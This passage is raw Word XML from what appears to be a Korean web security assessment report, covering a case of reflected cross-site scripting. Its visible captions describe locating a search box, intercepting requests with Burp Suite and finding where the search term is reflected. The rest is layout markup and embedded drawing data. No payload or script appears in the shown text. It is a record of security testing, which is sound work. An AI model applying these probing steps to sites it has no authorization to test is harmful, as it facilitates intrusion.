          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00557661">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00557661">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>ase 1</w:t>
      </w:r>
      <w:r w:rsidRPr="000D3131">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00955E9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00955E9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">eflected </w:t>
      </w:r>
      <w:r w:rsidR="00955E9F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>크로스사이트 스크립팅</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BA37A2" w14:textId="01743C24" w:rsidR="00AA5BEB" w:rsidRDefault="00AC4FFB" w:rsidP="00AC4FFB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251455488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6333E60E" wp14:editId="10070B7F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1948180</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>845820</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1074420" cy="220980"/>
                <wp:effectExtent l="0" t="0" r="11430" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="586" name="직사각형 586"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="107442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1D9F" id="직사각형 586" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:153.4pt;margin-top:66.6pt;width:84.6pt;height:17.4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IUdswIAAJYFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvZDdR0p+omypKFYRU&#10;tRUt6tnx2tmVvB5jO9mEW3kHJN6ACweeC5V3YOz9aVQqDog9eG3PzDeeb37OzneVIlthXQk6o8NB&#10;SonQHPJSrzP64W755oQS55nOmQItMroXjp7PXr86q81UjKAAlQtLEES7aW0yWnhvpknieCEq5gZg&#10;hEahBFsxj0e7TnLLakSvVDJK06OkBpsbC1w4h7cXjZDOIr6UgvtrKZ3wRGUU3+bjauO6CmsyO2PT&#10;tWWmKHn7DPYPr6hYqdFpD3XBPCMbW/4BVZXcggPpBxyqBKQsuYgxYDTD9Fk0twUzIsaC5DjT0+T+&#10;Hyy/2t5YUuYZnZwcUaJZhUl6/Pbw+Pn7zx8Pv75+IeEeWaqNm6Lyrbmx7cnhNoS8k7YKfwyG7CKz&#10;+55ZsfOE4+UwPR6PR5gAjrLRKD09idQnT9bGOv9WQEXCJqMWMxcJZdtL59EjqnYqwZmGZalUzJ7S&#10;pEYPp+kkjRYOVJkHadBzdr1aKEu2DAtguUzxC9Eg2oEanpTGyxBjE1Xc+b0SAUPp90IiRxjHqPEQ&#10;qlP0sIxzof2wERUsF423yaGzziK6joABWeIre+wWoNNsQDrs5s2tfjAVsbh74zb0vxn3FtEzaN8b&#10;V6UG+1JkCqNqPTf6HUkNNYGlFeR7rCALTWs5w5clZvCSOX/DLPYSJh3ng7/GRSrATEG7o6QA++ml&#10;+6CPJY5SSmrszYy6jxtmBSXqncbiPx2Ox6GZ42E8OQ6FZQ8lq0OJ3lQLwOwPcRIZHrdB36tuKy1U&#10;9zhG5sEripjm6Duj3NvusPDNzMBBxMV8HtWwgQ3zl/rW8AAeWA0Vere7Z9a0ZeyxAa6g62M2fVbN&#10;jW6w1DDfeJBlLPUnXlu+sflj4bSDKkyXw3PUehqns98AAAD//wMAUEsDBBQABgAIAAAAIQDa0pDu&#10;3gAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT4QwEIXvJv6HZky8ua3FAEHKRk2M0XjQVe9d&#10;2gWy7ZTQLuC/dzzpcd57efO9ert6x2Y7xSGgguuNAGaxDWbATsHnx+NVCSwmjUa7gFbBt42wbc7P&#10;al2ZsOC7nXepY1SCsdIK+pTGivPY9tbruAmjRfIOYfI60Tl13Ex6oXLvuBQi514PSB96PdqH3rbH&#10;3ckreAvHA3dfUr4U90+yePbl0s2vSl1erHe3wJJd018YfvEJHRpi2ocTmsicgkzkhJ7IyDIJjBI3&#10;RU7r9qTkpQDe1Pz/huYHAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAA&#10;CwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAsNCFHbMCAACWBQAA&#10;DgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA2tKQ7t4AAAAL&#10;AQAADwAAAAAAAAAAAAAAAAANBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAABgGAAAA&#10;AA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="270CC686" wp14:editId="7950C89F">
            <wp:extent cx="4572000" cy="1881668"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="2349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792" b="64070"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1881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D0C018" w14:textId="5D7849E9" w:rsidR="00C40C72" w:rsidRPr="00232CBC" w:rsidRDefault="00AA5BEB" w:rsidP="00C40C72">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="345" w:name="_Toc209094598"/>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25</w:t>
      </w:r>
      <w:r w:rsidR="00A32EB4" w:rsidRPr="00232CBC">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00232CBC">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AC4FFB" w:rsidRPr="00232CBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>메인에서 검색창 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="345"/>
    </w:p>
    <w:p w14:paraId="171F0203" w14:textId="77777777" w:rsidR="005D4064" w:rsidRDefault="005D4064" w:rsidP="005D4064">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E34F3A8" w14:textId="36230CB9" w:rsidR="00C40C72" w:rsidRDefault="005D4064" w:rsidP="005D4064">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251636736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D5FC0D6" wp14:editId="2B2D7286">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1056005</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1845627</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="656167" cy="146050"/>
                <wp:effectExtent l="0" t="0" r="10795" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="1325762229" name="직사각형 1325762229"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="656167"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D720" id="직사각형 1325762229" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:83.15pt;margin-top:145.3pt;width:51.65pt;height:1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vPtwIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdLNLktKomypqFYRU&#10;tREt6tnx2slKXo+xnWzCrbwDEm/AhQPPhco7MPb+NCoVB0QOjmdn5hvPNz+nZ7tKka2wrgSd0/Ro&#10;QInQHIpSr3L64Xb+6g0lzjNdMAVa5HQvHD2bvnxxWpuJyGANqhCWIIh2k9rkdO29mSSJ42tRMXcE&#10;RmhUSrAV8yjaVVJYViN6pZJsMBgnNdjCWODCOfx60SjpNOJLKbi/ltIJT1RO8W0+njaey3Am01M2&#10;WVlm1iVvn8H+4RUVKzUG7aEumGdkY8s/oKqSW3Ag/RGHKgEpSy5iDphNOniSzc2aGRFzQXKc6Wly&#10;/w+WX20XlpQF1u51NjoeZ1l2QolmFdbq4dv9w+fvP3/c//r6hRyokbPauAm63piFbSWH10DATtoq&#10;/GNqZBd53vc8i50nHD+OR+N0fEwJR1U6HA9GsQ7Jo7Oxzr8VUJFwyanFMkZ22fbSeQyIpp1JiKVh&#10;XioVS6k0qRH0JGAGlQNVFkEbBbtanitLtgy7YT4f4C80AKIdmKGkNH4MKTZJxZvfKxEwlH4vJBKG&#10;aWRNhNCqoodlnAvt00a1ZoVooo0Og3UeMXQEDMgSX9ljtwCdZQPSYTdvbu2Dq4id3ju3qf/NufeI&#10;kUH73rkqNdjnMlOYVRu5se9IaqgJLC2h2GM7WWjmzBk+L7GCl8z5BbM4WDiCuCz8NR5SAVYK2hsl&#10;a7Cfnvse7LHfUUtJjYOaU/dxw6ygRL3TOAkn6XAYJjsKw9FxhoI91CwPNXpTnQNWP8W1ZHi8Bnuv&#10;uqu0UN3hTpmFqKhimmPsnHJvO+HcNwsEtxIXs1k0w2k2zF/qG8MDeGA1dOjt7o5Z07axx/6/gm6o&#10;2eRJNze2wVPDbONBlrHVH3lt+cZNEBun3Vph1RzK0epxt05/AwAA//8DAFBLAwQUAAYACAAAACEA&#10;X7bgSN8AAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMAyG70i8Q2QkbixdKmVb13QCJIRA&#10;HGCwe9ZkbbXEqZqsLW+POcHNv/zp9+dyN3vHRjvELqCC5SIDZrEOpsNGwdfn090aWEwajXYBrYJv&#10;G2FXXV+VujBhwg877lPDqARjoRW0KfUF57FurddxEXqLtDuFwetEcWi4GfRE5d5xkWWSe90hXWh1&#10;bx9bW5/3F6/gPZxP3B2EeF09PIvVi19Pzfim1O3NfL8Fluyc/mD41Sd1qMjpGC5oInOUpcwJVSA2&#10;mQRGhJAbGo4K8mUugVcl//9D9QMAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAA&#10;AAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAA&#10;AJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAw6IvPtwIA&#10;AKMFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBftuBI&#10;3wAAAAsBAAAPAAAAAAAAAAAAAAAAABEFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA&#10;HQYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="003F0C6A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78B9C8A0" wp14:editId="098F54C7">
            <wp:extent cx="4572000" cy="2184010"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="26035"/>
            <wp:docPr id="12887709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0963" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2184010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4457A878" w14:textId="0D86C702" w:rsidR="00453598" w:rsidRDefault="00C40C72" w:rsidP="00453598">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="346" w:name="_Toc206630383"/>
      <w:bookmarkStart w:id="347" w:name="_Toc206630521"/>
      <w:bookmarkStart w:id="348" w:name="_Toc209094599"/>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26</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002D3DE9" w:rsidRPr="002D3DE9">
        <w:t>Burp Suite -&gt; Intercept on</w:t>
      </w:r>
      <w:r w:rsidR="00652B01">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00652B01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>후,</w:t>
      </w:r>
      <w:r w:rsidR="00652B01">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00652B01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>검색어 입력</w:t>
      </w:r>
      <w:bookmarkEnd w:id="346"/>
      <w:bookmarkEnd w:id="347"/>
      <w:bookmarkEnd w:id="348"/>
    </w:p>
    <w:p w14:paraId="3DD2DF23" w14:textId="77777777" w:rsidR="00453598" w:rsidRDefault="00453598" w:rsidP="00453598">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="034E6159" w14:textId="64D4D94E" w:rsidR="00453598" w:rsidRDefault="00453598" w:rsidP="00453598">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="349" w:name="_Toc206630384"/>
      <w:bookmarkStart w:id="350" w:name="_Toc206630522"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251465728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="797A9E78" wp14:editId="5AB3FE74">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1724660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1348105</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3289300" cy="196850"/>
                <wp:effectExtent l="0" t="0" r="25400" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="591" name="직사각형 591"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3289300" cy="196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F721F" id="직사각형 591" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:135.8pt;margin-top:106.15pt;width:259pt;height:15.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ojsQIAAJYFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDdpU5qomypqFYRU&#10;tREt6tnx2tmVvB5jO9mEW3mHSrwBFw48FyrvwNj706hUHBA5bDyemW883/ycnm0rRTbCuhJ0RgcH&#10;KSVCc8hLvcrox9v5mxNKnGc6Zwq0yOhOOHo2ff3qtDYTMYQCVC4sQRDtJrXJaOG9mSSJ44WomDsA&#10;IzQqJdiKeRTtKsktqxG9UskwTY+TGmxuLHDhHN5eNEo6jfhSCu6vpXTCE5VRfJuPXxu/y/BNpqds&#10;srLMFCVvn8H+4RUVKzUG7aEumGdkbcs/oKqSW3Ag/QGHKgEpSy5iDpjNIH2WzU3BjIi5IDnO9DS5&#10;/wfLrzYLS8o8o6PxgBLNKizS47f7xy/ff/64//X1gYR7ZKk2boLGN2ZhW8nhMaS8lbYK/5gM2UZm&#10;dz2zYusJx8vD4cn4MMUCcNQNxscno0h98uRtrPPvBFQkHDJqsXKRULa5dB4jomlnEoJpmJdKxeop&#10;TeoAmiJmUDlQZR60UbCr5bmyZMOwAebzFH8hG0TbM0NJabwMOTZZxZPfKREwlP4gJHKEeQybCKE7&#10;RQ/LOBfaDxpVwXLRRBvtB+s8YugIGJAlvrLHbgE6ywakw27e3NoHVxGbu3duU/+bc+8RI4P2vXNV&#10;arAvZaYwqzZyY9+R1FATWFpCvsMOstCMljN8XmIFL5nzC2ZxlrDouB/8NX6kAqwUtCdKCrCfX7oP&#10;9tjiqKWkxtnMqPu0ZlZQot5rbP7x4OgoDHMUjkZvhyjYfc1yX6PX1Tlg9bG98XXxGOy96o7SQnWH&#10;a2QWoqKKaY6xM8q97YRz3+wMXERczGbRDAfYMH+pbwwP4IHV0KG32ztmTdvGHgfgCro5ZpNn3dzY&#10;Bk8Ns7UHWcZWf+K15RuHPzZOu6jCdtmXo9XTOp3+BgAA//8DAFBLAwQUAAYACAAAACEARnKdtuAA&#10;AAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPzU7DMBCE70i8g7VI3KgTBzVpiFMBEkIgDlDo3Y23&#10;SVT/RLGbhLdnOcFtd2Y0+221XaxhE46h905CukqAoWu87l0r4evz6aYAFqJyWhnvUMI3BtjWlxeV&#10;KrWf3QdOu9gyKnGhVBK6GIeS89B0aFVY+QEdeUc/WhVpHVuuRzVTuTVcJMmaW9U7utCpAR87bE67&#10;s5Xw7k9HbvZCvOYPzyJ/scXcTm9SXl8t93fAIi7xLwy/+IQONTEd/NnpwIwEkadritKQigwYJfJi&#10;Q8qBlNssA15X/P8P9Q8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAA&#10;CwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAcllaI7ECAACWBQAA&#10;DgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEARnKdtuAAAAAL&#10;AQAADwAAAAAAAAAAAAAAAAALBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAABgGAAAA&#10;AA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75877572" wp14:editId="46358FC4">
            <wp:extent cx="4572000" cy="2126713"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="26035"/>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6899" r="4697" b="13693"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="21267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49"/>
      <w:bookmarkEnd w:id="350"/>
    </w:p>
    <w:p w14:paraId="55B039E4" w14:textId="0A2EB00B" w:rsidR="00453598" w:rsidRDefault="00453598" w:rsidP="00453598">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="351" w:name="_Toc206630385"/>
      <w:bookmarkStart w:id="352" w:name="_Toc206630523"/>
      <w:bookmarkStart w:id="353" w:name="_Toc209094600"/>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27</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>검색어가 삽입된 부분 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="351"/>
      <w:bookmarkEnd w:id="352"/>
      <w:bookmarkEnd w:id="353"/>
    </w:p>
    <w:p w14:paraId="5D5EB123" w14:textId="1F2B1068" w:rsidR="00453598" w:rsidRDefault="00453598" w:rsidP="00453598">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1893A626" w14:textId="24E13FC2" w:rsidR="00453598" w:rsidRDefault="00C07311" w:rsidP="00453598">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="354" w:name="_Toc206630386"/>
      <w:bookmarkStart w:id="355" w:name="_Toc206630524"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="255B4E3E" wp14:editId="0FD93410">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1059180</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1820545</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3499168" cy="167640"/>
                <wp:effectExtent l="0" t="0" r="25400" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="1951474570" name="직사각형 1951474570"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3499168"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C8E55" id="직사각형 1951474570" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:83.4pt;margin-top:143.35pt;width:275.55pt;height:1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9PlhwIAAN0EAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG1mp48RG5MBI4KJA&#10;kARIiqxpirIE8FeStpzu0jsUyA266aLnKtI79JGSEzftqqgX9IxmOKP35o2OTzZKkrVwvjG6oPne&#10;gBKhuSkbvSzoh5v5myNKfGC6ZNJoUdA74enJ9PWr49ZOxL6pjSyFIyii/aS1Ba1DsJMs87wWivk9&#10;Y4VGsDJOsQDXLbPSsRbVlcz2B4NR1hpXWme48B5Pz7ognab6VSV4uKwqLwKRBcW7hXS6dC7imU2P&#10;2WTpmK0b3r8G+4e3UKzRaPpU6owFRlau+aOUargz3lRhjxuVmapquEgYgCYfvEBzXTMrEhaQ4+0T&#10;Tf7/leUX6ytHmhKzGx/kw8PhwSFo0kxhVo9f7x8/f/vx/f7nwxeyEwZnrfUTXL22V673PMxIwKZy&#10;Kv4DGtkknu+eeBabQDgevh2Ox/kIyuCI5aPD0TANInu+bZ0P74RRJBoFdZhjopetz31AR6RuU2Iz&#10;beaNlGmWUpM2ghkcAAdnkFQlWYCpLEB6vaSEySW0yoNLJb2RTRmvx0LeLRen0pE1g17m8wF+USJo&#10;91ta7H3GfN3lpVCnJNUEyFk2qqBH8fL2ttSxukiC7BFECjvSorUw5R0G4UynUG/5vEGTc+bDFXOQ&#10;JNBgzcIljkoaQDS9RUlt3Ke/PY/5UAqilLSQOOB/XDEnKJHvNTQ0zocgnoTkYPD7cNxuZLEb0St1&#10;asBKjoW2PJkxP8itWTmjbrGNs9gVIaY5endE985p6FYP+8zFbJbSsAeWhXN9bXksHnmK9N5sbpmz&#10;/fwDlHNhtuvAJi9k0OV2QpitgqmapJFnXjHB6GCH0iz7fY9LuuunrOev0vQXAAAA//8DAFBLAwQU&#10;AAYACAAAACEA7rHCKeAAAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3KgT&#10;V0pCGqcCJIRAHEqhdzfeJlHtdRS7Sfh7zAmOoxnNvKm2izVswtH3jiSkqwQYUuN0T62Er8/nuwKY&#10;D4q0Mo5Qwjd62NbXV5UqtZvpA6d9aFksIV8qCV0IQ8m5bzq0yq/cgBS9kxutClGOLdejmmO5NVwk&#10;Scat6ikudGrApw6b8/5iJezc+cTNQYi3/PFF5K+2mNvpXcrbm+VhAyzgEv7C8Isf0aGOTEd3Ie2Z&#10;iTrLInqQIIosBxYTeZrfAztKWKfrFHhd8f8f6h8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+&#10;AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAA&#10;ACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAA&#10;ACEAUW/T5YcCAADdBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA&#10;CAAAACEA7rHCKeAAAAALAQAADwAAAAAAAAAAAAAAAADhBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA&#10;AAAEAAQA8wAAAO4FAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:bookmarkEnd w:id="354"/>
      <w:bookmarkEnd w:id="355"/>
      <w:r w:rsidRPr="003F0C6A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CD50C87" wp14:editId="1AAF05D5">
            <wp:extent cx="4572000" cy="2193972"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15875"/>
            <wp:docPr id="1628239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586" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2193972"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="784A7C83" w14:textId="2B43136D" w:rsidR="00453598" w:rsidRDefault="00453598" w:rsidP="00453598">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="356" w:name="_Toc206630387"/>
